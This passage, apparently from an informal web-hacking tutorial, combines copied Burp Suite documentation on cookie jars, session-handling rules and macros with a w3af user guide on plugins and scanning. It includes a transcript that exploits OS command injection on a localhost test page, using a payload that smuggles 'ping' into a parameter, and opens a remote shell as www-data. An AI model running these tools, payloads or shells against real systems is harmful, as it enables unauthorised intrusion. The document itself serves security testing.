application sessions. The cookie jar is shared between all Burp's tools. Cookies set in
responses are stored in the cookie jar, and can be automatically added to outgoing
requests.
All of this is configurable so, for example, you can update the cookie jar for cookies
received by the Proxy and Spider, and have Burp automatically add cookies to requests
sent by the Scanner and Repeater. The cookie jar configuration is shown in the
"sessions" tab within the main "options" tab:
As shown, by default the cookie jar is updated based on traffic from the Proxy and
Spider tools. You can view the contents of the cookie jar and edit cookies manually if
you wish:
For all tools other than the Proxy, HTTP responses are examined to identify new
cookies. In the case of the Proxy, incoming requests from the browser are also
inspected. This is useful where an application has previously set a persistent cookie
which is present in your browser, and which is required for proper handling of your
session. Having Burp update its cookie jar based on requests through the Proxy means
that all the necessary cookies will be added to the cookie jar even if the application
does not update the value of this cookie during your current visit.
Burp's cookie jar honours the domain scope of cookies, in a way that mimics Internet
Explorer's interpretation of cookie handling specifications. Path scope is not honoured.
Session handling rules
Burp lets you define a list of session handling rules, which give you very fine-grained
control over how Burp deals with an application's session handling mechanism and
related functionality. These rules are configured in the "sessions" tab within the main
"options" tab:
Each rule comprises a scope (what the rule applies to) and actions (what the rule does).
For every outgoing request that Burp makes, it determines which of the defined rules
are in-scope for the request, and performs all of those rules' actions in order (unless a
condition-checking action determines that no further actions should be applied to the
request).
The scope for each rule can be defined based on any or all of the following features of
the request being processed:
The Burp tool that is making the request.
The URL of the request.
The names of parameters within the request.

Each rule can perform one or more actions. The following actions are implemented:
Add cookies from the session handling cookie jar.
Set a specific cookie or parameter value.
Check whether the current session is valid, and perform sub-actions conditionally
on the result.
Prompt the user for in-browser session recovery.
Run a macro.
Run a post-request macro (this issues the current request, and then executes a
further macro).
All of these actions are highly configurable, and can be combined in arbitrary ways to
handle virtually any session handling mechanism. Being able to run arbitrary macros
(defined request sequences), and update specified cookie and parameter values based
on the result, allows you to automatically log back in to an application part way through
an automated scan or Intruder attack. Being able to prompt for in-browser session
recovery enables you to work with login mechanisms that involve keying a number from
a physical token, or solving a CAPTCHA-style puzzle.
By creating multiple rules with different scopes and actions, you can define a hierarchy
of behaviour that Burp will apply to different applications and functions. For example,
on a particular test you could define the following rules:
For all requests, add cookies from Burp's cookie jar.
For requests to a specific domain, validate that the current session with that
application is still active, and if not, run a macro to log back in to the application, and
update the cookie jar with the resulting session token.
For requests to a specific URL containing the __csrftoken parameter, first run a
macro to obtain a valid __csrftoken value, and use this when making the request.
The details of how to configure Burp to achieve this are described in later sections.
Macros
A key part of Burp's session handling functionality is the ability to run macros, as
defined in session handling rules. A macro is a predefined sequence of one or more
requests. Typical use cases for macros include:
Fetching a page of the application (such as the user's home page) to check that
the current session is still valid.
Performing a login to obtain a new valid session.
Obtaining a token or nonce to use as a parameter in another request.
When scanning or fuzzing a request in a multi-step process, performing the

necessary preceding requests, to get the application into a state where the targeted
request will be accepted.
In a multi-step process, after the "attack" request, completing the remaining

steps of the process, to confirm the action being performed, or obtain the result or
error message from the conclusion of that process.
Macros are recorded using your browser. When defining a macro, Burp displays a view
of the Proxy history, from which you can select the requests to be used for the macro.
You can select from previously made requests, or record the macro afresh and select
the new items from the history.
When you have recorded the macro, the macro editor shows the details of the items in
the macro, which you can review and configure as required:
As well as the basic sequence of requests, each macro includes some important
configuration about how items in the sequence should be handled, and any
interdependencies between items:
For each item in the macro, the following settings can be configured:
Whether cookies from the session handling cookie jar should be added to the
request.
Whether cookies received in the response should be added to the session

handling cookie jar.
For each parameter in the request, whether it should use a preset value, or a
value derived from a previous response in the macro.
Whether key characters should be URL-encoded in updated parameter values.

The ability to derive a parameter's value from a previous response in the macro is
particularly useful in some multi-stage processes, and in situations where applications
make aggressive use of anti-CSRF tokens. When a new macro is defined, Burp tries to
automatically find any relationships of this kind, by identifying parameters whose values
can be determined from the preceding response (form field values, redirection targets,
query strings in links, etc.). You can easily review and edit the default macro
configuration applied by Burp before the macro is used. Further, the configured macro
can be tested in isolation, and the full request/response sequence reviewed, to check
that it is functioning in the way you require.
Worked example
Let's look at an application function which can only be accessed within an authenticated
session, and employs a further token to defend against CSRF attacks. You want to test
this function for various input-based vulnerabilities like XSS and SQL injection.
Performing automated (and some manual) testing of this function faces two challenges:
(a) ensuring that the session being used remained valid; and (b) obtaining a valid token
to use in each request. Burp's session handling functionality can take care of both these
challenges.
To do this, we're going to define some session handling rules. These rules will be
applied to each request that is made to the function we are testing by the Intruder,
Scanner and Repeater tools:
Check whether the current session is valid, by requesting the user's landing page
in the application, and inspecting the response to confirm that the user is still logged in.
If the user is not logged in, log them back in to obtain a valid session.
Request the page containing the form whose submission we are going to test.
This form contains the anti-CSRF token that we need, within a hidden field.
Update the request to the function we are testing with the value of the anti-CSRF
token.
In most situations, we need to make use of Burp's own session handling cookie jar, so
the first rule we define tells Burp to add cookies from the cookie jar to every request.
This is, in fact, the default rule for the Scanner and Spider tools, so we'll just modify the
default rule to apply to the Intruder and Repeater tools as well. This rule performs a
single action, shown below:
The rule's scope is defined to include the relevant tools, and apply to all URLs:
Next, we need to check that the user's current session on the target application is valid.
Assuming we want to apply this rule to all requests within the target application, we can
define it to be in-scope for the whole of the application's domain:
We then add a suitable description and add an action of the type "check session is
valid":
This opens the editor for this type of action, which contains a lot of configuration
options:
The first set of options determines which request Burp uses to validate the current
session. The options are:
Issue the actual request that is currently being processed. This option is ideal if
the application always responds to out-of-session requests with a common response
signature, such as a redirection to the login.
Run a macro, to make one or more other requests. This option is ideal if, to
identify whether the session is valid, you need to request a standard item, such as the
user's home page. It is also the best option if you need to apply further rules to modify
the request currently being processed - for example (as in the present case) to update
an anti-CSRF token in the request. If the option to run a macro is selected, you have a
further option whether to do this every for every request, or only every N requests. If
the application is aggressive in terminating sessions in response to unexpected input, it
is recommended that you validate the session every time; otherwise, you can speed
things up by only validating the session periodically.
For the current example, we are going to run a macro to fetch the user's landing page
in the application, to check that their session is valid. To do this, we need to define our
macro, by clicking on the "new" button in the previous screenshot. This opens the
macro recorder, enabling us to select the request(s) that we wish to include in the
macro. In the present case, we only need to select the GET request for the user's
landing page:
The second set of options in the "check session is valid" action controls how Burp
inspects the (final) response from the macro to determine whether the session is valid.
Various options are available, and the configuration we need in the present case is
shown below:
The final set of options for this action determines how Burp will behave depending on
whether the current session is valid:
You can tell Burp not to perform any further actions for this request if the session
is valid. Using this option lets you define subsequent, separate actions to recover a valid
session. This option is mandatory if the request itself has already been issued in order
to determine whether the session is valid.
You can tell Burp to perform a sub-action if the session is invalid, and then
continue to process subsequent actions. This is useful when you need to define
subsequent actions in any case, following the session validity check, for example to run
a macro to obtain a request token or modify the application's state.
In the present example, we need to use the second option. If the session is invalid, we
will run a macro to log the user back in. We need to record a further macro, to perform
the actual login, and tell Burp to run this macro and update the session handling cookie
jar based on the results:
At this point, we have configured Burp to update requests with cookies from its cookie
jar, and to log the user back in to the target application when their session is invalid. To
complete the required configuration, we need to define a further rule to deal with the
anti-CSRF token used in the function we want to test. The request we are testing looks
like this:
POST /auth/4/NewUserStep2.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mdsec.net
Content-Length: 137
Cookie: SessionId=39DD9F0CB979BFB431005524A4010244
realname=testuser&username=testuser&userrole=user&password=letmein1&confirmpas
sword=letmein1&nonce=938549246127349541173
To ensure that our requests to this function are properly handled, we need to ensure
that a valid nonce is supplied with each request. The value of this nonce is supplied by
the application in a hidden field within the form that generates the above request. So
our rule needs to run a macro to fetch the page containing the form, and update the
current request with the value of the nonce parameter. We add a further rule with an
action of the type "run macro" and configure it as follows:
In the above configuration, we have specified that Burp should run a new macro, which
fetches the form containing the anti-CSRF token, and then obtain the nonce parameter
from the (final) macro response, and update this in the request. Alternatively, we could
select the "update all parameters" option, and Burp would automatically attempt to
match parameters in the request with those specified in the macro response.
In terms of the scope for this rule, this obviously needs to be defined more narrowly
than the whole application domain. For example, we could define the rule to apply only
to the exact URL in the above request. This is the best option if the application only
employs anti-CSRF tokens in a few locations. However, in some applications, tokens are
used for a large number of functions, and a token obtained within one function can be
submitted within a different function. In this situation, we could define a rule that
applies to the whole domain, but only to requests containing a specified parameter
name. In this way, any time a request is made to the application that contains an antiCSRF token, the rule will execute and Burp will fetch a new valid token to use in the
request.
The full configuration, with its three session handling rules and three macros, looks like
this within the main Burp UI:
You can test the configuration is working by logging out of the application, sending the
authenticated, token-protected request to Burp Repeater, and verifying that it performs
the required action. The request will probably take longer to return than normal,
because behind the scenes Burp is making several other requests, to validate your
session, log in again if necessary, and obtain a token to use in the request.
If you find your rules are not working in the way you intended, you can use the session
handling tracer to troubleshoot the problem.
Once you are happy that your session handling rules are working correctly, you can
send the request to Burp Intruder or Scanner, to perform your automated testing in the
normal way.
Session handling tracer

The configuration needed to apply Burp's session handling functionality to the features
of real-world applications is often complex, and mistakes are easily made. Burp
provides a tracer function for troubleshooting the session handling configuration. This
shows you all of the steps performed when Burp applies session handling rules to a
request, allowing you to see exactly how requests are being updated and issued. You
can access the session handling tracer via options / sessions / view sessions tracer:
Integration with Burp tools

It is worth noting a few points about how the session handling features affect some of
Burp's other functionality:
There is a default session handling rule which updates all requests made by the
Scanner and Spider with cookies from Burp's cookie jar. This ensures that all spidering
and sanning requests are made in-session, provided you maintain a valid session using
your browser. It also means that items in the active scan queue that are loaded from a
state file will be scanned within your current session, not the session that was active
when the state file was saved. If this is not the behaviour you require, you should
disable the default session handling rule before performing any scanning.
In cases where session handling rules modify a request before it is made (for
example, to update a cookie or other parameter), some of Burp's tools will show the
final, updated request, for purposes of clarity. This applies to the Intruder, Repeater and
Spider tools. Requests that are shown within reported Scanner issues continue to show
the original request, to facilitate clear comparison with the base request, where
necessary. To observe the final request for a scan issue, as modified by the session
handler, you can send the request to Burp Repeater and issue it there.
When the Scanner or Intruder makes a request that manipulates a cookie or

parameter that is affected by a session handling action, the action is not applied to that
request, to avoid interfering with the test that is being performed. For example, if you
are using Intruder to fuzz all the parameters in a request, and you have configured a
session handing rule to update the "sessid" cookie in that request, then the "sessid"
cookie will be updated when Intruder is fuzzing other parameters. When Intruder is
fuzzing the "sessid" cookie itself, Burp will send the Intruder payload string as the
"sessid" value, and will not update it as is done normally.
This means you have gone through all the modules in Burp
Suite.So you have got an idea on how to hack an web application
using burp suite but wait you forgot that W3AF was in store.
All the Burp Data has been flicked from a place which had the
following message:
Copyright 2010 PortSwigger Ltd. All rights reserved
So thanks to PortSwigger For the Interesting Help Manual for the hackers.
The W3AF Framework:
This part is a guide for the Web Application Attack and Audit
Framework ( w3af ), its goal is to provide a basic overview of what
the framework is, how it works and what you can do with it. w3af
is a complete environment for auditing and attacking web
applications. This environment provides a solid platform for
auditing and penetration-testing.
I will try to make it precise because I will have a great pain to
copy paste the materials and put it in formatted manner.
But I will give what It needs for you to learn the framework.Ok
then its get set GO.
Download
The framework can be downloaded from the project main page:
http://w3af.sf.net/#download
There are two ways to install w3af: from a release package (w3af setup for
windows and tgz package for Unix based systems) or from SVN. First time
users
should use the latest package, while more advanced users should perform a
SVN
checkout to get the latest version of the framework.
Installation
The framework should work on all platforms supported by Python,
particularly,
w3af has been tested on Linux, Windows XP, Windows Vista and OpenBSD.
This
user guide will guide you through the installation on a Linux platform,
installing
w3af in a Windows box is straight forward if you use the available installer
which
can be downloaded from the official w3af site.
Installation Requirements
The required packages to run w3af can be divided in two groups:
Core requirements:
Python 2.5
fpconst-0.7.2
pygoogle
nltk
SOAPpy
pyPdf
Beautiful Soup
Python OpenSSL
json.py
scapy
Graphical user interface requirements:
python sqlite3
graphviz
pygtk 2.0
gtk 2.12
As you may have guessed, the core requirements are needed to run w3af
with
any user interface (console or graphical), and the graphical user interface
requirements are needed only if you plan to use the GTK+ user interface.
Some of the requirements are bundled with the distribution file, in order to
make
the installation process easier for the novice user. The bundled requirements
can
be found inside the extlib directory. Most of the libraries can be run from that
directory, but some others require an installation process, the installation
steps
for these libraries are (as root):
cd w3af
cd extlib
cd fpconst0.7.2
python setup.py
cd ..
cd pygoogle
python setup.py
cd ..
cd nltk
python setup.py
cd ..
cd SOAPpy
python setup.py
cd pyPdf
python setup.py
install
install
install
install
install
w3af phases
Before even running w3af a user must know how the application is divided
and
how plugins are going to be executed. Basically, w3af has three types of
plugins:
discovery , audit and attack.
Discovery plugins have only one responsibility, finding new URLs, forms, and
other
injection points. A classic example of a discovery plugin is a web spider.
This
plugin takes a URL as input and returns one or more injection points. When a
user
enables more than one plugin of this type, they work in a loop: If plugin A
finds a
new URL in the first run, the w3af core will send that URL to plugin B. If
plugin B
then finds a new URL, it will be sent to plugin A. This process will go on until
all
plugins are run and no more knowledge about the application can be found
using
the enabled discovery plugins.
Audit plugins take the injection points found by discovery plugins and send
specially crafted data to all of them in order to find vulnerabilities. A classic
example of an audit plugin is one that searches for SQL injection
vulnerabilities.
Attack plugins objective is to exploit vulnerabilities found by audit plugins.
They
usually return a shell on the remote server, or a dump of remote tables in the
case of SQL injections exploits.
Running w3af
w3af has two user interfaces, the console user interface (consoleUI) and the
graphical user interface (gtkUi). This user guide will focus on the consoleUI,
which
is, at the moment of this writing much more tested and complete than the
gtkUi.
To fire up the consoleUI you just have to execute w3af without parameters
and
you will get a prompt like this one:
$ ./w3af_console
w3af>>>
From this prompt you will be able to configure the framework, launch scans
and
ultimately exploit a vulnerability. At this point you can start typing
commands, the
first command you have to learn is help (please note that commands are
case
sensitive):
w3af>>> help
||
| start | Start the scan. |
| plugins | Enable and configure plugins. |
| exploit | Exploit the vulnerability. |
| profiles | List and use scan profiles. |

||
| httpsettings
| Configure the http settings of the |
| | framework. |
| miscsettings
| Configure w3af misc settings. |
| target | Configure the target URL. |
||
| back | Go to the previous menu. |
| exit | Exit w3af. |
| assert | Check assertion. |
||
| help | Display help. issuing: help [command]|
| | , prints more specific help about |
| | "command" |
| version | Show w3af version information. |
| keys | Display key shortcuts. |
||
w3af>>>
w3af>>> help target
Configure the target URL.
w3af>>>
The main menu commands are explained in the help that is displayed above.
The
internals of every menu will be seen later in this document. As you already
noticed, the help command can take a parameter, and if available, a
detailed
help for that parameter will be shown, e.g. help keys.
Other interesting things to notice about the consoleUI are the tab completion
(type 'plu' and then TAB) and the command history (after typing some
commands,
navigate the history with the up and down arrows).
To enter a configuration menu, you just have to type it's name and hit enter,
you
will see how the prompt changes and you are now in that context:
w3af>>>httpsettings
w3af/config:httpsettings>>>
All the configuration menus provide the following commands:
help
view
set
back
Here is a usage example of this commands in the http-settings menu:

help
||
| view | List the available options and their values. |
| set | Set a parameter value. |
||
||
view
||
| Setting | Value | Description |
|
| timeout | 10 | The |
| | | timeout |
| | | for |
| | | connections |
| | | to the |
| | | HTTP |
| | | server |
| headersFile | | Set the |
| | | headers |
| | | filename. |
| | | This |
| | | file |
| | | has |
| | | additional |
| | | headers |
| | | that |
| | | are |
| | | added |
| | | to each |
| | | request. |
||
| ignoreSessCookies | False | Ignore |
| | | session |
| | | cookies |
| cookieJarFile | | Set the |
| | | cookiejar |
| | | filename. |
||
...
set timeout 5
view
...
| timeout | 5 | The |
...
To summarize, the view command is used to list all configurable
parameters,
with their values and a description. The set command is used to change its
value.
Finally we can execute back, . or press CTRL+C to return to the previous
menu. A detailed help for every configuration parameter can be obtained
using
help parameter like shown in this example:
help timeout
Help for parameter timeout:
===========================
Set low timeouts for LAN use and high timeouts for slow Internet
connections.
The http-settings and the misc-settings configuration menus are used to
set
system wide parameters that are used by the framework. All the parameters
have
defaults and in most cases you can leave them as they are. w3af was
designed in
a way that allows beginners to run it without having to learn a lot of its
internals,
and also flexible enough to be tunned by experts that know what they want
and
need to change internal configuration parameters to fulfill their tasks.
Running w3af with GTK user interface

The framework also has a graphical user interface that you can start by
executing:
$ ./w3af_gui
The graphical user interface allows you to perform all the actions that the
framework offers and features a much easier and faster way to start a scan
and
analyze the results.
In case you are wondering how the graphical user interface looks like, here is
a
screen shot:
Plugins
Plugins do all the magic. The plugins will find the URLs, discover the
vulnerabilities
and exploit them. So now, we will learn how to configure the plugins. In a
previous
section I told you that w3af had three types of plugins: discovery, audit and
exploit. Well, I actually lied a little bit because w3af other plugin types. The
complete list of plugins types is:
discovery
audit
grep
exploit
output
mangle
bruteforce
evasion
As said before, discovery plugins find new points of injection, that are later
used
by audit plugins to find vulnerabilities. Grep plugins analyze all page content
and
find vulnerabilities on pages that are requested by other plugins; for example
a
grep plugin will find a comment on the HTML body that has the word
password
inside it and generate a vulnerability based on it.
Exploit plugins [ab]use the vulnerabilities found in the audit phase and return
something useful to the user ( remote shell, SQL table dump, a proxy, etc ).
Output plugins are the way the framework and the plugins communicate with
the
user, output plugins save the data to a text or html file. Debugging
information is
also sent to the plugins and can be saved for analysis.
Mangle plugins are a way to modify requests and responses based on regular
expressions, think sed (stream editor) for the web.
Bruteforce plugins will bruteforce logins, they are actually part of the
discovery
phase.
Finally, evasion plugins try to evade simple intrusion detection rules.
Plugin configuration
The plugins are configured using the plugins configuration menu. Lets see
how
to do that:
w3af>>> plugins
w3af/plugins>>> help
||
| list | List available plugins. |
||
||
| mangle | View, configure and enable mangle plugins |
| evasion | View, configure and enable evasion plugins |
| discovery | View, configure and enable discovery plugins |
| grep | View, configure and enable grep plugins |
| bruteforce | View, configure and enable bruteforce plugins |
| audit | View, configure and enable audit plugins |
| output | View, configure and enable output plugins |
||
w3af/plugins>>>
As you may have noticed, all plugins can be configured here except the
exploit
plugins, we will talk about them later. The first step to take here is to know
the
syntax for configuring the plugins, so lets do that:
w3af/plugins>>> help audit
View, configure and enable audit plugins
Syntax: audit [config plugin | plugin1[,plugin2 ... pluginN] |

desc plugin]
Example: audit
Result: All enabled audit plugins are listed.
Example2: audit LDAPi,blindSqli
Result: LDAPi and blindSqli are configured to run
Example3: audit config LDAPi
Result: Enters to the plugin configuration menu.
Example4: audit all,!blindSqli
Result: All audit plugins are configured to run except
blindSqli.
Example1: audit desc LDAPi
Result: You will get the plugin description
w3af/plugins>>> help list
List available plugins.
Syntax: list {plugin type} [all | enabled | disabled]
By default all plugins are listed.
w3af/plugins>>>
Ok, so w3af is nice enough to tell us how to use it. Now we will see how to
get a
list of the available plugins and their status:
w3af/plugins>>> list audit
||
| Plugin name | Status | Conf | Description |
||
| LDAPi | | | Find LDAP injection |
| | | | bugs. |
| blindSqli | | Yes | Find blind SQL |
| | | | injection |
| | | | vulnerabilities. |
| buffOverflow | | | Find buffer overflow |
| dav | | | Tries to upload a |
| | | | file using HTTP PUT |
| | | | method. |
| eval | | | Finds incorrect usage |
| | | | of the eval(). |
...
To enable the xss and sqli plugins, and then verify that the command was
understood by the framework, we issue this set of commands:
w3af/plugins>>> audit xss, sqli
w3af/plugins>>> audit
||
| Plugin name | Status | Conf | Description |
||
...
| sqli | Enabled | | Find SQL injection |
| | | | bugs. |
...
| xss | Enabled | Yes | Find cross site |
| | | | scripting |
| xst | | | Verify Cross Site |
| | | | Tracing |
||
w3af/plugins>>>
Or if the user is interested in knowing exactly what a plugin does, he can also
run
the desc command like this:
w3af>>> plugins
w3af/plugins>>> audit desc fileUpload
This plugin will try to expoit insecure file upload forms.
One configurable parameter exists:
extensions
The extensions parameter is a comma separated list of extensions
that this plugin will try to upload. Many web applications
verify the extension of the file being uploaded, if special
extensions are required, they can be added here.
Some web applications check the contents of the files being
uploaded to see if they are really what their extension
is telling. To bypass this check, this plugin uses file
templates located at "plugins/audit/fileUpload/", this templates
are valid files for each extension that have a section ( the
comment field in a gif file for example ) that can be replaced
by scripting code ( PHP, ASP, etc ).
After uploading the file, this plugin will try to find it on
common directories like "upload" and "files" on every know
directory. If the file is found, a vulnerability exists.
w3af/plugins>>>
Now we know what this plugin does, but let's check their internals:
w3af/plugins>>> audit config xss
w3af/plugins/audit/config:xss>>> view
||
||
| numberOfChecks | 3 | Set the amount of checks to |
| | | perform for each fuzzable |
| | | parameter. Valid numbers: 1 to |
| | | 13 |
| checkStored | True | Search persistent XSS |
||
w3af/plugin/xss>>> set checkStored False
w3af/plugin/xss>>> back
w3af/plugins>>> audit config sqli
w3af/plugins/audit/config:sqli>>> view
||
||
||
w3af/plugins/audit/config:sqli>>>
w3af/plugins/audit/config:sqli>>> back
w3af/plugins>>>
The configuration menus for the plugins also have the set command for
changing
the parameters values, and the view command for listing existing values. On
the
previous example we disabled persistent cross site scripting checks in the
xss
plugin, and listed the options of the sqli plugin (it actually has no
configurable
parameters).
Starting a scan
After configuring all desired plugins the user has to set the target URL and
finally
start the scan. The target selection is done this way:
w3af>>> target
w3af/config:target>>> set target http://localhost/
w3af/config:target>>> back
w3af>>>
Finally, you execute start in order to run all the configured plugins.
w3af>>> start
At any time during the scan, you may hit enter in order to get a live status
of
the w3af core. Status lines look like this:
Status: Running discovery.webSpider on http://localhost/w3af/ |
Method: GET.
A complete session
A complete w3af session would look like this ( see the inline comments ):
$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName outputw3af.
txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back
All this previous commands have enabled two output plugins, console and
textFile
and configured them as needed.
w3af/plugins>>> discovery allowedMethods,webSpider
w3af/plugins>>> back
In this case, we will be running only discovery plugins. The enabled plugins
are
allowedMethods and webSpider .
w3af>>> target
w3af/target>>>set target http://localhost/w3af/
w3af/target>>>back
w3af>>> start
New URL found by discovery:
http://localhost/w3af/responseSplitting/responseSplitting.php
http://localhost/w3af/blindSqli/blindSqlistr.
php

http://localhost/w3af/webSpider/2.html
...
...
The URL: http://localhost/beef/hook/ has DAV methods enabled:
OPTIONS
GET
HEAD
POST
TRACE
PROPFIND
PROPPATCH
COPY
MOVE
LOCK
UNLOCK
DELETE
( is possibly enabled too, not tested for safety )
http://localhost/w3af/globalRedirect/wargame/
http://localhost/w3af/globalRedirect/w3afsite.
tgz
After the discovery phase is finished a summary is presented to the user:
The list of found URLs is:
http://
localhost/w3af/globalRedirect/w3af.testsite.tgz
http://
localhost/beef/hook/beefmagic.js.php
http://
localhost/w3af/globalRedirect/2.php
http://localhost/w3af/webSpider/11.html
...
A section of the summary is the points of injection that will be used in the
audit
phase:
Found 78 URLs and 102 different points of injection.
The list of Fuzzable requests is:
http://
localhost/w3af/ | Method: GET
http://
localhost/w3af/responseSplitting/responseSplitting.php
| Method: GET | Parameters: (header)
http://localhost/w3af/sqli/dataReceptor.php | Method: POST |
Parameters: (user,firstname)
Finally the user exits the application, returning to the shell.
w3af>>> exit
w3af, better than the regular script kiddie.
$
A warning about discovery

The discovery phase is a double edged sword: use it with wisdom, and it will
give
you a lot of knowledge about the remote web application, use it in a greedy
way
and you will be waiting for hours until the discovery phase ends. Just to make
things clear, the greedy way is to enable all discovery plugins ( discovery
all )
without even knowing what you are doing or having manually browsed the
web
and understood its internals.
Some examples will make things clear:
You are testing an intranet web application, the web application is huge
and doesn't use any macromedia flash or javascript code.
Recommendation : discovery all,!spiderMan, !fingerGoogle, !fingerMSN, !
fingerPKS, !MSNSpider, !googleSpider, !phishtank, !googleSafeBrowsing.
Reason: Spiderman should only be used when webSpider can't find all links.
The fingerGoogle, fingerMSN and fingerPKS plugins discover mail addresses
from search engines, if this is an intranet application, the addresses put in
this site wont be available in search engines because they never were
indexed. MSNSpider and googleSpider find URLs using search engines, like
the ones before, they are useless because search engines don't index
private pages. phishtank and googleSafeBrowsing should be enabled
because they search for phishing sites, and like the ones before them,
private sites aren't indexed in this systems.
You are testing a web application over the internet, the web application is
huge and doesn't use any macromedia flash or javascript code.
Recommendation : discovery all,!spiderMan, !wordnet , !googleSets.
Reason: Spiderman should only be used when webSpider can't find all links.
The wordnet and googleSets plugins are two plugins that take a long time to
run over the internet so it's a good idea to disable them.
huge and has macromedia flash or javascript code. You also know that the
application doesn't implement any web services.
Recommendation : discovery all, !wordnet , !googleSets, !wsdlFinder.
Reason: The wordnet and googleSets plugins are two plugins that take a
long time to run over the internet so it's a good idea to disable them.
Regarding wsdlFinder, if we already know that no web services exist, why

look for them?
huge, you really need to know all the links and functionality of the site and
you don't care waiting..
Recommendation : discovery all .
Reason: You really need to get a lot of knowledge about the site and don't
care if it takes a complete day.
When everything else fails...

So, you enabled only the recommended plugins in the discovery phase, you
started the framework one hour ago, the discovery is still running and
doesn't find
anything. When you find yourself in this situation you have two options,
waiting
for w3af to finish or hitting CTRL+C to finish the discovery and start with the
audit
phase.
You should also remember that if you are saving the debug information to a
text
file you can open a new terminal and run a tail -f w3af-output-file.txt to see
what w3af is really doing.
w3af scripts
While developing w3af, I realized that I needed a fast way to execute the
same
steps over and over, so the script functionality was born. w3af can run a
script file
using the -s argument. Script files are text files with one command on each
line.
An example script file would look like this:
$ head scripts/scriptosCommanding.
w3af
# This is the osCommanding demo:
plugins
output console,textFile
output
output config textFile
set fileName outputw3af.

txt
set verbose True
back
To run this script you would execute ./w3af_console s
scripts/scriptosCommanding.
w3af , the output would look just like if you typed every
command by hand in the console:
$ ./w3af_console s
scripts/scriptosCommanding.
w3af
w3af>>>plugins
w3af/plugins>>>output console,textFile
w3af/plugins>>>output
||
| Plugin | Status | Conf | Description |
| name | | | |
||
| console | Enabled | Yes | Print messages to the |
| | | | console. |
| gtkOutput | | | Saves messages to |
| | | | kb.kb.getData('gtkOutput', |
| | | | 'queue'), messages are saved |
| | | | in the form of objects. |
| htmlFile | | Yes | Print all messages to a HTML |
| | | | file. |
| textFile | Enabled | Yes | Prints all messages to a |
| | | | text file. |
| webOutput | | | Print all messages to the |
| | | | web user interface this
|
| | | | plugin and the web user |
| | | | interface are DEPRECATED. |
||
w3af/plugins>>>output config textFile

w3af/plugins/output/config:textFile>>>set fileName outputw3af.
txt
w3af/plugins/output/config:textFile>>>set verbose True
w3af/plugins/output/config:textFile>>>back
w3af/plugins>>>output config console
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>back
w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target
http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start
The list of URLs is:
http://
localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
http://
localhost/w3af/osCommanding/vulnerable.php | Method:
GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/
vulnerable.php", using HTTP method GET. The sent data was:
"command=+ping+c+
9+localhost". The vulnerability was found in
the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change
the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of
available shells:
[
0] <osCommandingShell object (ruser: "wwwdata"
| rsystem:
"Linux brick 2.6.2419generic
i686 GNU/Linux")>
Please use the interact command to interact with the shell
objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell.
Commands typed in this menu will be runned on the remote web
server.
w3af/exploit/osCommandingShell0>>>
ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
endInteraction
w3af/exploit>>>back
w3af>>>exit
spawned a remote shell today?
$
The Output
All the output of w3af is managed by the output plugins. Each output plugin
will
write in a different format ( txt, html, etc ), for example the textFile plugin
writes
all output to the output-w3af.txt file by default. The configuration of this
plugins is
done just like other plugins, as seen before:
$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>>
txt
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>>
w3af/plugins/output/config:console>>>
set fileName outputw3af.

set verbose True
back
set verbose False
back
This will configure the textFile plugin to output all messages, including the
debugging information ( see set verbose True ) to the outputw3af.
txt
file. Here is an example of what is written to this file:
[ Sun Sep 14 17:36:09 2008 debug
w3afCore
] Exiting
setOutputPlugins()
[ Sun Sep 14 17:36:09 2008 debug
w3afCore
] Called
w3afCore.start()
[ Sun Sep 14 17:36:09 2008 debug
xUrllib
] Called
buildOpeners
[ Sun Sep 14 17:36:09 2008 debug
keepalive
] keepalive: The
connection manager has 0 active connections.
[ Sun Sep 14 17:36:09 2008 debug
keepalive
] keepalive:
added one connection, len(self._hostmap["localhost"]): 1
[ Sun Sep 14 17:36:09 2008 debug
httplib
] DNS response from
DNS server for domain: localhost
[ Sun Sep 14 17:36:09 2008 debug
xUrllib
] GET
returned HTTP code "200"
Output plugins also handle the logging of HTTP requests and responses,
every
plugin handles this data in a different way, for example, the textFile plugin
writes
requests and responses to a file, while the htmlFile plugin disregards the data
and
simply does nothing with it. An example of a HTTP log written by the textFile
follows:
==========Request 4 Sun
Sep 14 17:36:12 2008==============
GET http://localhost/w3af/osCommanding/vulnerable.php?
command=+ping+c+
4+localhost HTTP/1.1
Host: localhost
Acceptencoding:
identity
Accept: */*
Useragent:
w3af.sourceforge.net
==========Response 4 Sun
Sep 14 17:36:12 2008==============
HTTP/1.1 200 OK
date: Sun, 14 Sep 2008 20:36:09 GMT
transferencoding:
chunked
xpoweredby:
PHP/5.2.42ubuntu5.3
contenttype:
text/html
server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/
5.2.42ubuntu5.3
with SuhosinPatch
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64
time=0.024 ms
time=0.035 ms
time=0.037 ms
time=0.037 ms
localhost
ping statistics 4
packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.024/0.033/0.037/0.006 ms
==============================================
===============
Just in case you are wondering, all messages sent by the plugins and the
framework are sent to ALL enabled plugins, so if you have enabled textFile
and
